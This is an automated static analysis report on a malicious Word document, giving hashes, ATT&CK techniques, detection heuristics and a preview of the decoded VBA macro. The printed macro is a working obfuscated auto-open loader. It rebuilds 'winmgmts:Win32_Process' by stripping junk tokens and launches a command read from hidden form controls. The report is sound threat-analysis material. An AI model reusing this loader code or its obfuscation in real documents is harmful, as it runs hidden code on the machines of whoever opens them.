Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 699c6142400e9400…

MALICIOUS

Office (OLE)

134.0 KB Created: 2019-09-24 06:41:00 Authoring application: Microsoft Office Word First seen: 2019-12-09
MD5: 68f0b24c261a3d64b95881aab868d87c SHA-1: ff5da1fabaefda8904bf1c619d6ccee425bc62ec SHA-256: 699c6142400e94008029f2aa6b0a4ac1f1ce6650e201dd2b57923e04fc3cb922
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing an obfuscated VBA macro. The macro utilizes CreateObject and execution tokens, indicating it is likely a loader for a second-stage payload. The presence of an AutoOpen macro and the obfuscated nature of the loader suggest a deliberate attempt to evade detection and execute malicious code upon opening the document.

Heuristics 8

  • ClamAV: Doc.Malware.Generic-7178224-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-7178224-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9912 bytes
SHA-256: e0b8b3d2e64d78c84720afa88b50057a0caf5233a12e55215c9bca23ba65309a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Kkmjww"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "V5d5wwdq, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Kuj257, 1, 1, MSForms, TextBox"
Attribute VB_Control = "R8sizknj, 2, 2, MSForms, TextBox"
Attribute VB_Control = "P5zziw, 3, 3, MSForms, TextBox"
Attribute VB_Control = "K0zw6p, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Rvaatk6s, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Yfm2nuz, 6, 6, MSForms, TextBox"
Attribute VB_Control = "Wi0uda9, 7, 7, MSForms, TextBox"
Attribute VB_Control = "Vjolh56c, 8, 8, MSForms, TextBox"
Attribute VB_Control = "C6h13sc, 9, 9, MSForms, TextBox"
Attribute VB_Control = "X4i4im, 10, 10, MSForms, TextBox"
Attribute VB_Control = "Rjms62, 11, 11, MSForms, TextBox"
Attribute VB_Control = "Mn1kbo6t, 12, 12, MSForms, TextBox"
Attribute VB_Control = "Lpanu774, 13, 13, MSForms, TextBox"
Attribute VB_Control = "Fhwcnk, 14, 14, MSForms, TextBox"
Attribute VB_Control = "Qidfou, 15, 15, MSForms, TextBox"
Attribute VB_Control = "Awwcn3i, 16, 16, MSForms, TextBox"
Attribute VB_Control = "Nuus40t, 17, 17, MSForms, TextBox"

Attribute VB_Name = "Shqkwv"
Private Const Brjjiv As String = "Xnp6q4q"
Private Const Tpvkdl As String = "Itj64o"
Private Wvhidrap      As String
Private J5hw3qk      As Boolean
Private Pjiv7b      As Integer
Private Declare Sub Ffqczj Lib "V0rdjf" ()
Private Declare Sub H61ubr Lib "P44ci1" ()
Function Nnazwms()
Dim pDBXVeleSn95, yALtDyQJVU12 As Integer
yALtDyQJVU12 = 8541
For pDBXVeleSn95 = 0 To 88
yALtDyQJVU12 = yALtDyQJVU12 + pDBXVeleSn95
DoEvents
Next pDBXVeleSn95
Ma37awj5 = Ti1iz0cl(Kkmjww.Mn1kbo6t + Kkmjww.Yfm2nuz)
Dim kmJQTFcJOI63, mxBXzQQtbS22 As Integer
mxBXzQQtbS22 = 8263
For kmJQTFcJOI63 = 0 To 96
mxBXzQQtbS22 = mxBXzQQtbS22 + kmJQTFcJOI63
DoEvents
Next kmJQTFcJOI63
Z7bap4 = CreateObject(Ti1iz0cl("_:_a_:_aw_:_ainmgm_:_ats:W_:_ain3_:_a2_P_:_aroces_:_as_:_a")).Create(Ma37awj5, Cj8ajz, Yh3wpj, R5tjsf)
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function
Function Ti1iz0cl(E6pinh)
Dim bIEeUYPMQL63, cfibQITmka13 As Integer
cfibQITmka13 = 5323
For bIEeUYPMQL63 = 0 To 25
cfibQITmka13 = cfibQITmka13 + bIEeUYPMQL63
DoEvents
Next bIEeUYPMQL63
Ti1iz0cl = Replace(E6pinh, Replace("uegw72bdja_uegw72bdja:uegw72bdja_uegw72bdjauegw72bdjaauegw72bdja", "uegw72bdja", ""), "")
End Function


Attribute VB_Name = "S8u1adw"
Private Const S3vczf As String = "Z918ur1p"
Private Const Qz0su2 As String = "Y60rrn"
Private Pzkb0pl      As String
Private C2ijjt      As Boolean
Private Ypdfc9tz      As Integer
Private Declare Sub Gpzhdb Lib "J61dhb" ()
Private Declare Sub R1uiqcwt Lib "Y72pqba" ()
Sub autoopen()
Dim SQZiGxarup86, NxIwNiZDoj34 As Integer
NxIwNiZDoj34 = 6788
For SQZiGxarup86 = 0 To 17
NxIwNiZDoj34 = NxIwNiZDoj34 + SQZiGxarup86
DoEvents
Next SQZiGxarup86
Nnazwms
End Sub
Function Yh3wpj()
Dim TYWXvZKgog25, OnSlpvPgmm82 As Integer
OnSlpvPgmm82 = 4395
For TYWXvZKgog25 = 0 To 36
OnSlpvPgmm82 = OnSlpvPgmm82 + TYWXvZKgog25
DoEvents
Next TYWXvZKgog25
Z7bap4$ = N7oo7a3p + Y83nojt
Dim YIqBrnoQql13, TyvIxAOXdA51 As Integer
TyvIxAOXdA51 = 9313
For YIqBrnoQql13 = 0 To 65
TyvIxAOXdA51 = TyvIxAOXdA51 + YIqBrnoQql13
DoEvents
Next YIqBrnoQql13
Set Yh3wpj = CreateObject(Ti1iz0cl(Kkmjww.P5zziw))
Yh3wpj.ShowWindow! = Z7bap4
Dim UKUBCTGYrd34, wUXYnJzxWl84 As Integer
wUXYnJzxWl84 = 7624
For UKUBCTGYrd34 = 0 To 76
wUXYnJzxWl84 = wUXYnJzxWl84 + UKUBCTGYrd34
DoEvents
Next UKUBCTGYrd34
End Function


' Processing file: /opt/analyzer/scan_staging/8c225fda003c4b8e898e042c0066ae92.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Kkmjww - 3295 bytes
' Macros/VBA/Shqkwv - 3266 bytes

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.